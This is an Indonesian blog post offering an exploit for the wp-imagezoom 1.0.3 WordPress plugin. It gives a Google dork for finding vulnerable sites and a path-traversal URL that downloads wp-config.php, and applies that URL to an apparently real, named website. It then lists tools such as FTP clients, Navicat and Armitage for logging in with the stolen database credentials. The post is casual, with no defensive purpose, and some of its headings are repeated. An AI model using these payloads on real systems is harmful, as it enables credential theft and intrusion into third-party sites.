Exploit wp-imagezoom.1.0.3 Remote File Disclosure
08.58
Lagi main reduniverse.com , bosan ga ada siapa-siapa.. anak-anak pada
sibuk sendiri, yaudah we postingin ini, lumayan juga nih buat di coba, :D . Emang ga terlalu banyak nih targetnya kalau kata saya , tadi dah ngedork di google. Oke coba aja deh..
Dork :
Gimana donk konekin nya :
Sebenernya tergantung port yang kebuka sih menurut informasi sekitar, bisa menggunakan beberapa cara ini :
Dork :
Exploit :inurl:/wp-content/plugins/wp-imagezoom/
Example :wp-content/plugins/wp-imagezoom/download.php?file=../../../wp-config.php
Download, dan lihat Confignya. :Dhttp://estanciarural.com/anuncio/wp-content/plugins/wp-imagezoom/download.php?file=../../../wp-config.php
Gimana donk konekin nya :
Sebenernya tergantung port yang kebuka sih menurut informasi sekitar, bisa menggunakan beberapa cara ini :
- Menggunakan ftp
- Menggunakan navicat for mysql
- Filezilla
- Menggunakan armitage ( bila anda menggunakan backtrack / blackbuntu ).
0 komentar: